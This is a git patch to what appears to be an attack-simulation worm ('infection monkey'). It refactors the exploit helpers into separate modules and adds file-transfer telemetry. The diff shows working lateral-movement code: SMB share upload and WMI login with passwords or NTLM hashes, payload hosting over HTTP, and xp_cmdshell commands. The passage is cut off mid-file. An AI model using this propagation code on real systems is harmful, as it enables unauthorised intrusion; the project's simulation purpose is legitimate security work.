From 8e3f1e7817c0c84131a7423f3f0b19fb38186bdc Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Fri, 5 Jul 2019 10:04:16 +0300 Subject: [PATCH 1/6] exploit.tools refactored into separate modules to avoid circular dependencies while using telemetries --- monkey/infection_monkey/dropper.py | 2 +- monkey/infection_monkey/exploit/hadoop.py | 3 +- monkey/infection_monkey/exploit/mssqlexec.py | 15 +- monkey/infection_monkey/exploit/rdpgrinder.py | 5 +- monkey/infection_monkey/exploit/sambacry.py | 6 +- monkey/infection_monkey/exploit/shellshock.py | 4 +- monkey/infection_monkey/exploit/smbexec.py | 4 +- monkey/infection_monkey/exploit/sshexec.py | 8 +- monkey/infection_monkey/exploit/tools.py | 536 ------------------ .../exploit/tools/__init__.py | 0 .../infection_monkey/exploit/tools/helpers.py | 134 +++++ .../exploit/tools/http_tools.py | 62 ++ .../exploit/tools/smb_tools.py | 216 +++++++ .../exploit/tools/wmi_tools.py | 150 +++++ monkey/infection_monkey/exploit/vsftpd.py | 4 +- monkey/infection_monkey/exploit/web_rce.py | 3 +- monkey/infection_monkey/exploit/weblogic.py | 3 +- .../infection_monkey/exploit/win_ms08_067.py | 4 +- monkey/infection_monkey/exploit/wmiexec.py | 5 +- monkey/infection_monkey/monkey.py | 2 +- .../post_breach/actions/users_custom_pba.py | 9 + .../telemetry/attack/t1105_telem.py | 22 + monkey/infection_monkey/transport/http.py | 8 +- monkey/infection_monkey/tunnel.py | 2 +- monkey/infection_monkey/windows_upgrader.py | 2 +- 25 files changed, 641 insertions(+), 568 deletions(-) delete mode 100644 monkey/infection_monkey/exploit/tools.py create mode 100644 monkey/infection_monkey/exploit/tools/__init__.py create mode 100644 monkey/infection_monkey/exploit/tools/helpers.py create mode 100644 monkey/infection_monkey/exploit/tools/http_tools.py create mode 100644 monkey/infection_monkey/exploit/tools/smb_tools.py create mode 100644 monkey/infection_monkey/exploit/tools/wmi_tools.py create mode 100644 monkey/infection_monkey/telemetry/attack/t1105_telem.py diff --git a/monkey/infection_monkey/dropper.py b/monkey/infection_monkey/dropper.py index cc065a745..d421d1b0a 100644 --- a/monkey/infection_monkey/dropper.py +++ b/monkey/infection_monkey/dropper.py @@ -11,7 +11,7 @@ from ctypes import c_char_p import filecmp from infection_monkey.config import WormConfiguration -from infection_monkey.exploit.tools import build_monkey_commandline_explicitly +from infection_monkey.exploit.tools.helpers import build_monkey_commandline_explicitly from infection_monkey.model import MONKEY_CMDLINE_WINDOWS, MONKEY_CMDLINE_LINUX, GENERAL_CMDLINE_LINUX from infection_monkey.system_info import SystemInfoCollector, OperatingSystem diff --git a/monkey/infection_monkey/exploit/hadoop.py b/monkey/infection_monkey/exploit/hadoop.py index 958bab7eb..10ddbe589 100644 --- a/monkey/infection_monkey/exploit/hadoop.py +++ b/monkey/infection_monkey/exploit/hadoop.py @@ -11,7 +11,8 @@ import logging import posixpath from infection_monkey.exploit.web_rce import WebRCE -from infection_monkey.exploit.tools import HTTPTools, build_monkey_commandline, get_monkey_depth +from infection_monkey.exploit.tools.http_tools import HTTPTools +from infection_monkey.exploit.tools.helpers import build_monkey_commandline, get_monkey_depth from infection_monkey.model import MONKEY_ARG, ID_STRING, HADOOP_WINDOWS_COMMAND, HADOOP_LINUX_COMMAND __author__ = 'VakarisZ' diff --git a/monkey/infection_monkey/exploit/mssqlexec.py b/monkey/infection_monkey/exploit/mssqlexec.py index 9d1dcb2d6..bac923063 100644 --- a/monkey/infection_monkey/exploit/mssqlexec.py +++ b/monkey/infection_monkey/exploit/mssqlexec.py @@ -6,9 +6,10 @@ from time import sleep import pymssql from common.utils.exploit_enum import ExploitType -from infection_monkey.exploit import HostExploiter, tools -from infection_monkey.exploit.tools import HTTPTools -from infection_monkey.exploit.tools import get_monkey_dest_path +from infection_monkey.exploit import HostExploiter +from infection_monkey.exploit.tools.http_tools import HTTPTools +from infection_monkey.exploit.tools.helpers import get_monkey_dest_path, get_target_monkey, \ + build_monkey_commandline, get_monkey_depth from infection_monkey.model import DROPPER_ARG from infection_monkey.utils import get_monkey_dir_path @@ -40,7 +41,7 @@ class MSSQLExploiter(HostExploiter): return False # Get monkey exe for host and it's path - src_path = tools.get_target_monkey(self.host) + src_path = get_target_monkey(self.host) if not src_path: LOG.info("Can't find suitable monkey executable for host %r", self.host) return False @@ -68,9 +69,9 @@ class MSSQLExploiter(HostExploiter): MSSQLExploiter.run_file(cursor, tmp_file_path) self.add_executed_cmd(' '.join(commands)) # Form monkey's command in a file - monkey_args = tools.build_monkey_commandline(self.host, - tools.get_monkey_depth() - 1, - dst_path) + monkey_args = build_monkey_commandline(self.host, + get_monkey_depth() - 1, + dst_path) monkey_args = ["xp_cmdshell \">%s\"" % (part, tmp_file_path) for part in textwrap.wrap(monkey_args, 40)] commands = ["xp_cmdshell \"%s\"" % (dst_path, DROPPER_ARG, tmp_file_path)] diff --git a/monkey/infection_monkey/exploit/rdpgrinder.py b/monkey/infection_monkey/exploit/rdpgrinder.py index 0db63e86d..70b5da262 100644 --- a/monkey/infection_monkey/exploit/rdpgrinder.py +++ b/monkey/infection_monkey/exploit/rdpgrinder.py @@ -10,11 +10,10 @@ from rdpy.protocol.rdp import rdp from twisted.internet import reactor from infection_monkey.exploit import HostExploiter -from infection_monkey.exploit.tools import HTTPTools, get_monkey_depth -from infection_monkey.exploit.tools import get_target_monkey +from infection_monkey.exploit.tools.helpers import get_monkey_depth, get_target_monkey, build_monkey_commandline +from infection_monkey.exploit.tools.http_tools import HTTPTools from infection_monkey.model import RDP_CMDLINE_HTTP_BITS, RDP_CMDLINE_HTTP_VBS from infection_monkey.network.tools import check_tcp_port -from infection_monkey.exploit.tools import build_monkey_commandline from infection_monkey.telemetry.attack.t1197_telem import T1197Telem from infection_monkey.utils import utf_to_ascii from common.utils.exploit_enum import ExploitType diff --git a/monkey/infection_monkey/exploit/sambacry.py b/monkey/infection_monkey/exploit/sambacry.py index 7d9ed1010..9a9f934fb 100644 --- a/monkey/infection_monkey/exploit/sambacry.py +++ b/monkey/infection_monkey/exploit/sambacry.py @@ -19,8 +19,10 @@ import infection_monkey.monkeyfs as monkeyfs from infection_monkey.exploit import HostExploiter from infection_monkey.model import DROPPER_ARG from infection_monkey.network.smbfinger import SMB_SERVICE -from infection_monkey.exploit.tools import build_monkey_commandline, get_target_monkey_by_os, get_monkey_depth +from infection_monkey.exploit.tools.helpers import build_monkey_commandline, get_target_monkey_by_os, get_monkey_depth from infection_monkey.pyinstaller_utils import get_binary_file_path +from common.utils.attack_utils import ScanStatus +from infection_monkey.telemetry.attack.t1105_telem import T1105Telem __author__ = 'itay.mizeretz' @@ -266,7 +268,7 @@ class SambaCryExploiter(HostExploiter): with monkeyfs.open(monkey_bin_64_src_path, "rb") as monkey_bin_file: smb_client.putFile(share, "\\%s" % self.SAMBACRY_MONKEY_FILENAME_64, monkey_bin_file.read) - + T1105Telem(ScanStatus.USED, self.host.ip_addr[0], monkey_bin_64_src_path).send() smb_client.disconnectTree(tree_id) def trigger_module(self, smb_client, share): diff --git a/monkey/infection_monkey/exploit/shellshock.py b/monkey/infection_monkey/exploit/shellshock.py index d65733d03..074758685 100644 --- a/monkey/infection_monkey/exploit/shellshock.py +++ b/monkey/infection_monkey/exploit/shellshock.py @@ -7,10 +7,10 @@ from random import choice import requests from infection_monkey.exploit import HostExploiter -from infection_monkey.exploit.tools import get_target_monkey, HTTPTools, get_monkey_depth +from infection_monkey.exploit.tools.helpers import get_target_monkey, get_monkey_depth, build_monkey_commandline from infection_monkey.model import DROPPER_ARG from infection_monkey.exploit.shellshock_resources import CGI_FILES -from infection_monkey.exploit.tools import build_monkey_commandline +from infection_monkey.exploit.tools.http_tools import HTTPTools __author__ = 'danielg' diff --git a/monkey/infection_monkey/exploit/smbexec.py b/monkey/infection_monkey/exploit/smbexec.py index d49e66ae8..04e79f4bd 100644 --- a/monkey/infection_monkey/exploit/smbexec.py +++ b/monkey/infection_monkey/exploit/smbexec.py @@ -4,11 +4,11 @@ from impacket.dcerpc.v5 import transport, scmr from impacket.smbconnection import SMB_DIALECT from infection_monkey.exploit import HostExploiter -from infection_monkey.exploit.tools import SmbTools, get_target_monkey, get_monkey_depth +from infection_monkey.exploit.tools.helpers import get_target_monkey, get_monkey_depth, build_monkey_commandline +from infection_monkey.exploit.tools.smb_tools import SmbTools from infection_monkey.model import MONKEY_CMDLINE_DETACHED_WINDOWS, DROPPER_CMDLINE_DETACHED_WINDOWS from infection_monkey.network import SMBFinger from infection_monkey.network.tools import check_tcp_port -from infection_monkey.exploit.tools import build_monkey_commandline from common.utils.exploit_enum import ExploitType LOG = getLogger(__name__) diff --git a/monkey/infection_monkey/exploit/sshexec.py b/monkey/infection_monkey/exploit/sshexec.py index c7cf030c1..1c616c6e1 100644 --- a/monkey/infection_monkey/exploit/sshexec.py +++ b/monkey/infection_monkey/exploit/sshexec.py @@ -6,11 +6,12 @@ import StringIO import infection_monkey.monkeyfs as monkeyfs from infection_monkey.exploit import HostExploiter -from infection_monkey.exploit.tools import get_target_monkey, get_monkey_depth +from infection_monkey.exploit.tools.helpers import get_target_monkey, get_monkey_depth, build_monkey_commandline from infection_monkey.model import MONKEY_ARG from infection_monkey.network.tools import check_tcp_port -from infection_monkey.exploit.tools import build_monkey_commandline from common.utils.exploit_enum import ExploitType +from common.utils.attack_utils import ScanStatus +from infection_monkey.telemetry.attack.t1105_telem import T1105Telem __author__ = 'hoffer' @@ -162,10 +163,11 @@ class SSHExploiter(HostExploiter): ftp.putfo(file_obj, self._config.dropper_target_path_linux, file_size=monkeyfs.getsize(src_path), callback=self.log_transfer) ftp.chmod(self._config.dropper_target_path_linux, 0o777) - + T1105Telem(ScanStatus.USED, self.host.ip_addr[0], src_path).send() ftp.close() except Exception as exc: LOG.debug("Error uploading file into victim %r: (%s)", self.host, exc) + T1105Telem(ScanStatus.SCANNED, self.host.ip_addr[0], src_path).send() return False try: diff --git a/monkey/infection_monkey/exploit/tools.py b/monkey/infection_monkey/exploit/tools.py deleted file mode 100644 index 0b496f8be..000000000 --- a/monkey/infection_monkey/exploit/tools.py +++ /dev/null @@ -1,536 +0,0 @@ -import logging -import ntpath -import os -import os.path -import pprint -import socket -import struct -import sys -import urllib - -from impacket.dcerpc.v5 import transport, srvs -from impacket.dcerpc.v5.dcom import wmi -from impacket.dcerpc.v5.dcom.wmi import DCERPCSessionError -from impacket.dcerpc.v5.dcomrt import DCOMConnection -from impacket.dcerpc.v5.dtypes import NULL -from impacket.smb3structs import SMB2_DIALECT_002, SMB2_DIALECT_21 -from impacket.smbconnection import SMBConnection, SMB_DIALECT - -import infection_monkey.config -import infection_monkey.monkeyfs as monkeyfs -from infection_monkey.network.firewall import app as firewall -from infection_monkey.network.info import get_free_tcp_port, get_routes -from infection_monkey.transport import HTTPServer, LockedHTTPServer -from threading import Lock - - -class DceRpcException(Exception): - pass - - -__author__ = 'itamar' - -LOG = logging.getLogger(__name__) - - -class AccessDeniedException(Exception): - def __init__(self, host, username, password, domain): - super(AccessDeniedException, self).__init__("Access is denied to %r with username %s\\%s and password %r" % - (host, domain, username, password)) - - -class WmiTools(object): - class WmiConnection(object): - def __init__(self): - self._dcom = None - self._iWbemServices = None - - @property - def connected(self): - return self._dcom is not None - - def connect(self, host, username, password, domain=None, lmhash="", nthash=""): - if not domain: - domain = host.ip_addr - - dcom = DCOMConnection(host.ip_addr, - username=username, - password=password, - domain=domain, - lmhash=lmhash, - nthash=nthash, - oxidResolver=True) - - try: - iInterface = dcom.CoCreateInstanceEx(wmi.CLSID_WbemLevel1Login, - wmi.IID_IWbemLevel1Login) - except Exception as exc: - dcom.disconnect() - - if "rpc_s_access_denied" == exc.message: - raise AccessDeniedException(host, username, password, domain) - - raise - - iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface) - - try: - self._iWbemServices = iWbemLevel1Login.NTLMLogin('//./root/cimv2', NULL, NULL) - self._dcom = dcom - except: - dcom.disconnect() - - raise - finally: - iWbemLevel1Login.RemRelease() - - def close(self): - assert self.connected, "WmiConnection isn't connected" - - self._iWbemServices.RemRelease() - self._iWbemServices = None - - self._dcom.disconnect() - self._dcom = None - - @staticmethod - def dcom_wrap(func): - def _wrapper(*args, **kwarg): - try: - return func(*args, **kwarg) - finally: - WmiTools.dcom_cleanup() - - return _wrapper - - @staticmethod - def dcom_cleanup(): - for port_map in DCOMConnection.PORTMAPS.keys(): - del DCOMConnection.PORTMAPS[port_map] - for oid_set in DCOMConnection.OID_SET.keys(): - del DCOMConnection.OID_SET[port_map] - - DCOMConnection.OID_SET = {} - DCOMConnection.PORTMAPS = {} - if DCOMConnection.PINGTIMER: - DCOMConnection.PINGTIMER.cancel() - DCOMConnection.PINGTIMER.join() - DCOMConnection.PINGTIMER = None - - @staticmethod - def get_object(wmi_connection, object_name): - assert isinstance(wmi_connection, WmiTools.WmiConnection) - assert wmi_connection.connected, "WmiConnection isn't connected" - - return wmi_connection._iWbemServices.GetObject(object_name)[0] - - @staticmethod - def list_object(wmi_connection, object_name, fields=None, where=None): - assert isinstance(wmi_connection, WmiTools.WmiConnection) - assert wmi_connection.connected, "WmiConnection isn't connected" - - if fields: - fields_query = ",".join(fields) - else: - fields_query = "*" - - wql_query = "SELECT %s FROM %s" % (fields_query, object_name) - - if where: - wql_query += " WHERE %s" % (where,) - - LOG.debug("Execution WQL query: %r", wql_query) - - iEnumWbemClassObject = wmi_connection._iWbemServices.ExecQuery(wql_query) - - query = [] - try: - while True: - try: - next_item = iEnumWbemClassObject.Next(0xffffffff, 1)[0] - record = next_item.getProperties() - - if not fields: - fields = record.keys() - - query_record = {} - for key in fields: - query_record[key] = record[key]['value'] - - query.append(query_record) - except DCERPCSessionError as exc: - if 1 == exc.error_code: - break - - raise - finally: - iEnumWbemClassObject.RemRelease() - - return query - - -class SmbTools(object): - @staticmethod - def copy_file(host, src_path, dst_path, username, password, lm_hash='', ntlm_hash='', timeout=60): - assert monkeyfs.isfile(src_path), "Source file to copy (%s) is missing" % (src_path,) - config = infection_monkey.config.WormConfiguration - src_file_size = monkeyfs.getsize(src_path) - - smb, dialect = SmbTools.new_smb_connection(host, username, password, lm_hash, ntlm_hash, timeout) - if not smb: - return None - - # skip guest users - if smb.isGuestSession() > 0: - LOG.debug("Connection to %r granted guest privileges with user: %s, password: '%s'," - " LM hash: %s, NTLM hash: %s", - host, username, password, lm_hash, ntlm_hash) - - try: - smb.logoff() - except: - pass - - return None - - try: - resp = SmbTools.execute_rpc_call(smb, "hNetrServerGetInfo", 102) - except Exception as exc: - LOG.debug("Error requesting server info from %r over SMB: %s", - host, exc) - return None - - info = {'major_version': resp['InfoStruct']['ServerInfo102']['sv102_version_major'], - 'minor_version': resp['InfoStruct']['ServerInfo102']['sv102_version_minor'], - 'server_name': resp['InfoStruct']['ServerInfo102']['sv102_name'].strip("\0 "), - 'server_comment': resp['InfoStruct']['ServerInfo102']['sv102_comment'].strip("\0 "), - 'server_user_path': resp['InfoStruct']['ServerInfo102']['sv102_userpath'].strip("\0 "), - 'simultaneous_users': resp['InfoStruct']['ServerInfo102']['sv102_users']} - - LOG.debug("Connected to %r using %s:\n%s", - host, dialect, pprint.pformat(info)) - - try: - resp = SmbTools.execute_rpc_call(smb, "hNetrShareEnum", 2) - except Exception as exc: - LOG.debug("Error enumerating server shares from %r over SMB: %s", - host, exc) - return None - - resp = resp['InfoStruct']['ShareInfo']['Level2']['Buffer'] - - high_priority_shares = () - low_priority_shares = () - file_name = ntpath.split(dst_path)[-1] - - for i in range(len(resp)): - share_name = resp[i]['shi2_netname'].strip("\0 ") - share_path = resp[i]['shi2_path'].strip("\0 ") - current_uses = resp[i]['shi2_current_uses'] - max_uses = resp[i]['shi2_max_uses'] - - if current_uses >= max_uses: - LOG.debug("Skipping share '%s' on victim %r because max uses is exceeded", - share_name, host) - continue - elif not share_path: - LOG.debug("Skipping share '%s' on victim %r because share path is invalid", - share_name, host) - continue - - share_info = {'share_name': share_name, - 'share_path': share_path} - - if dst_path.lower().startswith(share_path.lower()): - high_priority_shares += ((ntpath.sep + dst_path[len(share_path):], share_info),) - - low_priority_shares += ((ntpath.sep + file_name, share_info),) - - shares = high_priority_shares + low_priority_shares - - file_uploaded = False - for remote_path, share in shares: - share_name = share['share_name'] - share_path = share['share_path'] - - if not smb: - smb, _ = SmbTools.new_smb_connection(host, username, password, lm_hash, ntlm_hash, timeout) - if not smb: - return None - - try: - tid = smb.connectTree(share_name) - except Exception as exc: - LOG.debug("Error connecting tree to share '%s' on victim %r: %s", - share_name, host, exc) - continue - - LOG.debug("Trying to copy monkey file to share '%s' [%s + %s] on victim %r", - share_name, share_path, remote_path, host) - - remote_full_path = ntpath.join(share_path, remote_path.strip(ntpath.sep)) - - # check if file is found on destination - if config.skip_exploit_if_file_exist: - try: - file_info = smb.listPath(share_name, remote_path) - if file_info: - if src_file_size == file_info[0].get_filesize(): - LOG.debug("Remote monkey file is same as source, skipping copy") - return remote_full_path - - LOG.debug("Remote monkey file is found but different, moving along with attack") - except: - pass # file isn't found on remote victim, moving on - - try: - with monkeyfs.open(src_path, 'rb') as source_file: - # make sure of the timeout - smb.setTimeout(timeout) - smb.putFile(share_name, remote_path, source_file.read) - - file_uploaded = True - - LOG.info("Copied monkey file '%s' to remote share '%s' [%s] on victim %r", - src_path, share_name, share_path, host) - - break - except Exception as exc: - LOG.debug("Error uploading monkey to share '%s' on victim %r: %s", - share_name, host, exc) - continue - finally: - try: - smb.logoff() - except: - pass - - smb = None - - if not file_uploaded: - LOG.debug("Couldn't find a writable share for exploiting" - " victim %r with username: %s, password: '%s', LM hash: %s, NTLM hash: %s", - host, username, password, lm_hash, ntlm_hash) - return None - - return remote_full_path - - @staticmethod - def new_smb_connection(host, username, password, lm_hash='', ntlm_hash='', timeout=60): - try: - smb = SMBConnection(host.ip_addr, host.ip_addr, sess_port=445) - except Exception as exc: - LOG.debug("SMB connection to %r on port 445 failed," - " trying port 139 (%s)", host, exc) - - try: - smb = SMBConnection('*SMBSERVER', host.ip_addr, sess_port=139) - except Exception as exc: - LOG.debug("SMB connection to %r on port 139 failed as well (%s)", - host, exc) - return None, None - - dialect = {SMB_DIALECT: "SMBv1", - SMB2_DIALECT_002: "SMBv2.0", - SMB2_DIALECT_21: "SMBv2.1"}.get(smb.getDialect(), "SMBv3.0") - - # we know this should work because the WMI connection worked - try: - smb.login(username, password, '', lm_hash, ntlm_hash) - except Exception as exc: - LOG.debug("Error while logging into %r using user: %s, password: '%s', LM hash: %s, NTLM hash: %s: %s", - host, username, password, lm_hash, ntlm_hash, exc) - return None, dialect - - smb.setTimeout(timeout) - return smb, dialect - - @staticmethod - def execute_rpc_call(smb, rpc_func, *args): - dce = SmbTools.get_dce_bind(smb) - rpc_method_wrapper = getattr(srvs, rpc_func, None) - if not rpc_method_wrapper: - raise ValueError("Cannot find RPC method '%s'" % (rpc_method_wrapper,)) - - return rpc_method_wrapper(dce, *args) - - @staticmethod - def get_dce_bind(smb): - rpctransport = transport.SMBTransport(smb.getRemoteHost(), - smb.getRemoteHost(), - filename=r'\srvsvc', - smb_connection=smb) - dce = rpctransport.get_dce_rpc() - dce.connect() - dce.bind(srvs.MSRPC_UUID_SRVS) - - return dce - - -class HTTPTools(object): - @staticmethod - def create_transfer(host, src_path, local_ip=None, local_port=None): - if not local_port: - local_port = get_free_tcp_port() - - if not local_ip: - local_ip = get_interface_to_target(host.ip_addr) - - if not firewall.listen_allowed(): - return None, None - - httpd = HTTPServer(local_ip, local_port, src_path) - httpd.daemon = True - httpd.start() - - return "http://%s:%s/%s" % (local_ip, local_port, urllib.quote(os.path.basename(src_path))), httpd - - @staticmethod - def create_locked_transfer(host, src_path, local_ip=None, local_port=None): - """ - Create http server for file transfer with a lock - :param host: Variable with target's information - :param src_path: Monkey's path on current system - :param local_ip: IP where to host server - :param local_port: Port at which to host monkey's download - :return: Server address in http://%s:%s/%s format and LockedHTTPServer handler - """ - # To avoid race conditions we pass a locked lock to http servers thread - lock = Lock() - lock.acquire() - if not local_port: - local_port = get_free_tcp_port() - - if not local_ip: - local_ip = get_interface_to_target(host.ip_addr) - - if not firewall.listen_allowed(): - LOG.error("Firewall is not allowed to listen for incomming ports. Aborting") - return None, None - - httpd = LockedHTTPServer(local_ip, local_port, src_path, lock) - httpd.start() - lock.acquire() - return "http://%s:%s/%s" % (local_ip, local_port, urllib.quote(os.path.basename(src_path))), httpd - - -def get_interface_to_target(dst): - if sys.platform == "win32": - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - try: - s.connect((dst, 1)) - ip_to_dst = s.getsockname()[0] - except KeyError: - ip_to_dst = '127.0.0.1' - finally: - s.close() - return ip_to_dst - else: - # based on scapy implementation - - def atol(x): - ip = socket.inet_aton(x) - return struct.unpack("!I", ip)[0] - - routes = get_routes() - dst = atol(dst) - paths = [] - for d, m, gw, i, a in routes: - aa = atol(a) - if aa == dst: - paths.append((0xffffffff, ("lo", a, "0.0.0.0"))) - if (dst & m) == (d & m): - paths.append((m, (i, a, gw))) - if not paths: - return None - paths.sort() - ret = paths[-1][1] - return ret[1] - - -def get_target_monkey(host): - from infection_monkey.control import ControlClient - import platform - import sys - - if host.monkey_exe: - return host.monkey_exe - - if not host.os.get('type'): - return None - - monkey_path = ControlClient.download_monkey_exe(host) - - if host.os.get('machine') and monkey_path: - host.monkey_exe = monkey_path - - if not monkey_path: - if host.os.get('type') == platform.system().lower(): - # if exe not found, and we have the same arch or arch is unknown and we are 32bit, use our exe - if (not host.os.get('machine') and sys.maxsize < 2 ** 32) or \ - host.os.get('machine', '').lower() == platform.machine().lower(): - monkey_path = sys.executable - - return monkey_path - - -def get_target_monkey_by_os(is_windows, is_32bit): - from infection_monkey.control import ControlClient - return ControlClient.download_monkey_exe_by_os(is_windows, is_32bit) - - -def build_monkey_commandline_explicitly(parent=None, tunnel=None, server=None, depth=None, location=None): - cmdline = "" - - if parent is not None: - cmdline += " -p " + parent - if tunnel is not None: - cmdline += " -t " + tunnel - if server is not None: - cmdline += " -s " + server - if depth is not None: - if depth < 0: - depth = 0 - cmdline += " -d %d" % depth - if location is not None: - cmdline += " -l %s" % location - - return cmdline - - -def build_monkey_commandline(target_host, depth, location=None): - from infection_monkey.config import GUID - return build_monkey_commandline_explicitly( - GUID, target_host.default_tunnel, target_host.default_server, depth, location) - - -def get_monkey_depth(): - from infection_monkey.config import WormConfiguration - return WormConfiguration.depth - - -def get_monkey_dest_path(url_to_monkey): - """ - Gets destination path from monkey's source url. - :param url_to_monkey: Hosted monkey's url. egz : http://localserver:9999/monkey/windows-32.exe - :return: Corresponding monkey path from configuration - """ - from infection_monkey.config import WormConfiguration - if not url_to_monkey or ('linux' not in url_to_monkey and 'windows' not in url_to_monkey): - LOG.error("Can't get destination path because source path %s is invalid.", url_to_monkey) - return False - try: - if 'linux' in url_to_monkey: - return WormConfiguration.dropper_target_path_linux - elif 'windows-32' in url_to_monkey: - return WormConfiguration.dropper_target_path_win_32 - elif 'windows-64' in url_to_monkey: - return WormConfiguration.dropper_target_path_win_64 - else: - LOG.error("Could not figure out what type of monkey server was trying to upload, " - "thus destination path can not be chosen.") - return False - except AttributeError: - LOG.error("Seems like monkey's source configuration property names changed. " - "Can not get destination path to upload monkey") - return False diff --git a/monkey/infection_monkey/exploit/tools/__init__.py b/monkey/infection_monkey/exploit/tools/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/monkey/infection_monkey/exploit/tools/helpers.py b/monkey/infection_monkey/exploit/tools/helpers.py new file mode 100644 index 000000000..83a8bfd92 --- /dev/null +++ b/monkey/infection_monkey/exploit/tools/helpers.py @@ -0,0 +1,134 @@ +import logging +import socket +import struct +import sys + +from infection_monkey.network.info import get_routes + +LOG = logging.getLogger(__name__) + + +def get_interface_to_target(dst): + """ + :param dst: destination IP address string without port. E.G. '192.168.1.1.' + :return: IP address string of an interface that can connect to the target. E.G. '192.168.1.4.' + """ + if sys.platform == "win32": + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + try: + s.connect((dst, 1)) + ip_to_dst = s.getsockname()[0] + except KeyError: + ip_to_dst = '127.0.0.1' + finally: + s.close() + return ip_to_dst + else: + # based on scapy implementation + + def atol(x): + ip = socket.inet_aton(x) + return struct.unpack("!I", ip)[0] + + routes = get_routes() + dst = atol(dst) + paths = [] + for d, m, gw, i, a in routes: + aa = atol(a) + if aa == dst: + paths.append((0xffffffff, ("lo", a, "0.0.0.0"))) + if (dst & m) == (d & m): + paths.append((m, (i, a, gw))) + if not paths: + return None + paths.sort() + ret = paths[-1][1] + return ret[1] + + +def get_target_monkey(host): + from infection_monkey.control import ControlClient + import platform + import sys + + if host.monkey_exe: + return host.monkey_exe + + if not host.os.get('type'): + return None + + monkey_path = ControlClient.download_monkey_exe(host) + + if host.os.get('machine') and monkey_path: + host.monkey_exe = monkey_path + + if not monkey_path: + if host.os.get('type') == platform.system().lower(): + # if exe not found, and we have the same arch or arch is unknown and we are 32bit, use our exe + if (not host.os.get('machine') and sys.maxsize < 2 ** 32) or \ + host.os.get('machine', '').lower() == platform.machine().lower(): + monkey_path = sys.executable + + return monkey_path + + +def get_target_monkey_by_os(is_windows, is_32bit): + from infection_monkey.control import ControlClient + return ControlClient.download_monkey_exe_by_os(is_windows, is_32bit) + + +def build_monkey_commandline_explicitly(parent=None, tunnel=None, server=None, depth=None, location=None): + cmdline = "" + + if parent is not None: + cmdline += " -p " + parent + if tunnel is not None: + cmdline += " -t " + tunnel + if server is not None: + cmdline += " -s " + server + if depth is not None: + if depth < 0: + depth = 0 + cmdline += " -d %d" % depth + if location is not None: + cmdline += " -l %s" % location + + return cmdline + + +def build_monkey_commandline(target_host, depth, location=None): + from infection_monkey.config import GUID + return build_monkey_commandline_explicitly( + GUID, target_host.default_tunnel, target_host.default_server, depth, location) + + +def get_monkey_depth(): + from infection_monkey.config import WormConfiguration + return WormConfiguration.depth + + +def get_monkey_dest_path(url_to_monkey): + """ + Gets destination path from monkey's source url. + :param url_to_monkey: Hosted monkey's url. egz : http://localserver:9999/monkey/windows-32.exe + :return: Corresponding monkey path from configuration + """ + from infection_monkey.config import WormConfiguration + if not url_to_monkey or ('linux' not in url_to_monkey and 'windows' not in url_to_monkey): + LOG.error("Can't get destination path because source path %s is invalid.", url_to_monkey) + return False + try: + if 'linux' in url_to_monkey: + return WormConfiguration.dropper_target_path_linux + elif 'windows-32' in url_to_monkey: + return WormConfiguration.dropper_target_path_win_32 + elif 'windows-64' in url_to_monkey: + return WormConfiguration.dropper_target_path_win_64 + else: + LOG.error("Could not figure out what type of monkey server was trying to upload, " + "thus destination path can not be chosen.") + return False + except AttributeError: + LOG.error("Seems like monkey's source configuration property names changed. " + "Can not get destination path to upload monkey") + return False diff --git a/monkey/infection_monkey/exploit/tools/http_tools.py b/monkey/infection_monkey/exploit/tools/http_tools.py new file mode 100644 index 000000000..f23ba8276 --- /dev/null +++ b/monkey/infection_monkey/exploit/tools/http_tools.py @@ -0,0 +1,62 @@ +import logging +import os +import os.path +import urllib +from threading import Lock + +from infection_monkey.network.firewall import app as firewall +from infection_monkey.network.info import get_free_tcp_port +from infection_monkey.transport import HTTPServer, LockedHTTPServer +from infection_monkey.exploit.tools.helpers import get_interface_to_target + + +__author__ = 'itamar' + +LOG = logging.getLogger(__name__) + + +class HTTPTools(object): + @staticmethod + def create_transfer(host, src_path, local_ip=None, local_port=None): + if not local_port: + local_port = get_free_tcp_port() + + if not local_ip: + local_ip = get_interface_to_target(host.ip_addr) + + if not firewall.listen_allowed(): + return None, None + + httpd = HTTPServer(local_ip, local_port, src_path) + httpd.daemon = True + httpd.start() + + return "http://%s:%s/%s" % (local_ip, local_port, urllib.quote(os.path.basename(src_path))), httpd + + @staticmethod + def create_locked_transfer(host, src_path, local_ip=None, local_port=None): + """ + Create http server for file transfer with a lock + :param host: Variable with target's information + :param src_path: Monkey's path on current system + :param local_ip: IP where to host server + :param local_port: Port at which to host monkey's download + :return: Server address in http://%s:%s/%s format and LockedHTTPServer handler + """ + # To avoid race conditions we pass a locked lock to http servers thread + lock = Lock() + lock.acquire() + if not local_port: + local_port = get_free_tcp_port() + + if not local_ip: + local_ip = get_interface_to_target(host.ip_addr) + + if not firewall.listen_allowed(): + LOG.error("Firewall is not allowed to listen for incomming ports. Aborting") + return None, None + + httpd = LockedHTTPServer(local_ip, local_port, src_path, lock) + httpd.start() + lock.acquire() + return "http://%s:%s/%s" % (local_ip, local_port, urllib.quote(os.path.basename(src_path))), httpd diff --git a/monkey/infection_monkey/exploit/tools/smb_tools.py b/monkey/infection_monkey/exploit/tools/smb_tools.py new file mode 100644 index 000000000..89e755d28 --- /dev/null +++ b/monkey/infection_monkey/exploit/tools/smb_tools.py @@ -0,0 +1,216 @@ +import logging +import ntpath +import pprint + +from impacket.dcerpc.v5 import transport, srvs +from impacket.smb3structs import SMB2_DIALECT_002, SMB2_DIALECT_21 +from impacket.smbconnection import SMBConnection, SMB_DIALECT + +import infection_monkey.config +import infection_monkey.monkeyfs as monkeyfs +from common.utils.attack_utils import ScanStatus +from infection_monkey.telemetry.attack.t1105_telem import T1105Telem + +__author__ = 'itamar' + +LOG = logging.getLogger(__name__) + + +class SmbTools(object): + + @staticmethod + def copy_file(host, src_path, dst_path, username, password, lm_hash='', ntlm_hash='', timeout=60): + assert monkeyfs.isfile(src_path), "Source file to copy (%s) is missing" % (src_path,) + config = infection_monkey.config.WormConfiguration + src_file_size = monkeyfs.getsize(src_path) + + smb, dialect = SmbTools.new_smb_connection(host, username, password, lm_hash, ntlm_hash, timeout) + if not smb: + return None + + # skip guest users + if smb.isGuestSession() > 0: + LOG.debug("Connection to %r granted guest privileges with user: %s, password: '%s'," + " LM 